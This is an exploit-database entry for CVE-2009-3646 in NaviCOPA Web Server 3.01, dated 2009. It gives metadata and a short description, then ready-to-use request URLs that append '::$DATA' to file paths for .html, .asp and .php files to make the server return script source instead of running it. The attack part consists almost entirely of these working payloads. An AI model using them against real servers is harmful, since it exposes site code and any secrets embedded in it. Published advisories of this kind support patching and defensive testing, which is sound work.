NaviCOPA Web Server 3.01 - Source Code Disclosure
Author: Dr_IDE
type: remote
platform: windows
port:
date_added: 2009-09-15
date_updated:
verified: 1
codes: OSVDB-58386;CVE-2009-3646
tags:
aliases:
screenshot_url:
application_url:
#################################################################################
#
# NaviCOPA Web Server 3.01 Remote Source Code Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
#
#################################################################################
- Description -
NaviCOPA Web Server 3.01 is a Windows based HTTP server. This is the latest version of
the application available.
NaviCOPA is vulnerable to remote arbitrary source code disclosure by the following means.
- Technical Details -
http://[ webserver IP]/[ file ][::$DATA]
http://172.16.2.101/index.html::$DATA
http://172.16.2.101/default.asp::$DATA
http://172.16.2.101/index.php::$DATA
# milw0rm.com [2009-09-16]